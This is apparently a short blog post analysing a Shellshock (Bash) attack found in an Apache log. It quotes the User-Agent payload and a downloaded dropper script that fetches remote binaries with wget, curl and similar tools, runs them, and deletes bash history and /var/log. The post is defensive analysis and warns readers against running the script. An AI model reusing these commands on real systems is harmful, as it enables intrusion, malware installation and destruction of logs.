Bash Vulnerability

Bash Vulnerability is a family of security bugs in the widely used Unix Bash shell. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

Here real life example that. In apache access log at User-Agent Header are linux commands: - - [09/Aug/2016:18:02:52 +0300] "GET /cgi-bin/login HTTP/1.0" 403 0 "-" "() { :;}; /bin/bash -c \"mkdir /var/.udp; wget -O /tmp/;wget -O /tmp/;curl -o /tmp/;cd /tmp/; GET;fetch;lwp-download;mv /tmp/ /tmp/ ; cat /tmp/ |grep -v 'echo d' >> /tmp/updo ; chmod +x /tmp/updo; chmod +x updo; sh /tmp/updo ;rm -rf /tmp/up*;rm -rf updo*; rm -rf /root/.bash_history; rm -rf /var/log/*\""

If we look first, we found domain where wget, or other linux shell download tools try download more code (

First look that domain pointing 4 servers, where download bash script.

#host has address has address has address has address

Now we downloaded and looked inside that bash script:

mkdir /tmp/.udp
echo z1 >> /tmp/upfile
echo z2 >> /tmp/upfile
echo z3 >> /tmp/upfile
echo z4 >> /tmp/upfile
echo z5 >> /tmp/upfile
echo z6 >> /tmp/upfile
echo z7 >> /tmp/upfile
echo z8 >> /tmp/upfile
echo z9 >> /tmp/upfile
echo z10 >> /tmp/upfile
echo z11 >> /tmp/upfile
echo z12 >> /tmp/upfile
echo d2 >> /tmp/upfile
echo d3	>> /tmp/upfile
echo d4	>> /tmp/upfile
echo d5	>> /tmp/upfile
echo d6	>> /tmp/upfile
echo d7	>> /tmp/upfile
for file in $(cat /tmp/upfile); do killall $file; ls /tmp/.udp/$file || wget$file -O /tmp/.udp/$file; chmod +x /tmp/.udp/$file; /tmp/.udp/$file ; done
for file2 in $(cat /tmp/upfile); do killall $file2; cd /tmp/.udp; ls /tmp/.udp/$file2 || GET$file2; chmod +x $file2 ; /tmp/.udp/$file2 ; done
for file3 in $(cat /tmp/upfile); do killall $file3; cd /tmp/.udp; ls /tmp/.udp/$file3 || fetch$file3; chmod +x $file3 ; /tmp/.udp/$file3 ; done
for file4 in $(cat /tmp/upfile); do killall $file4; cd /tmp/.udp; ls /tmp/.udp/$file4 || lwp-download$file4; chmod +x $file4; /tmp/.udp/$file4 ; done
for file5 in $(cat /tmp/upfile); do killall $file5; cd /tmp/.udp; ls /tmp/.udp/$file5 || curl -o$file5; chmod +x $file5; /tmp/.udp/$file5 ; done
rm -rf /tmp/upfile
rm -rf /root/.bash_history

Then source code delete d2,d3,d4,d5,d6,d7 files, we dont know why and then it run downloaded binaries and remove itself and all logs to hide itself.

mv /tmp/ /tmp/ ; cat /tmp/ |grep -v 'echo d' >> /tmp/updo ; chmod +x /tmp/updo; chmod +x updo; sh /tmp/updo ;rm -rf /tmp/up*;rm -rf updo*; rm -rf /root/.bash_history; rm -rf /var/log/*\"

Dont try run these script, because domain is still active and we dont know what these binaries does in linux environment. I dont have time at moment setup sandbox and test these binaries at moment!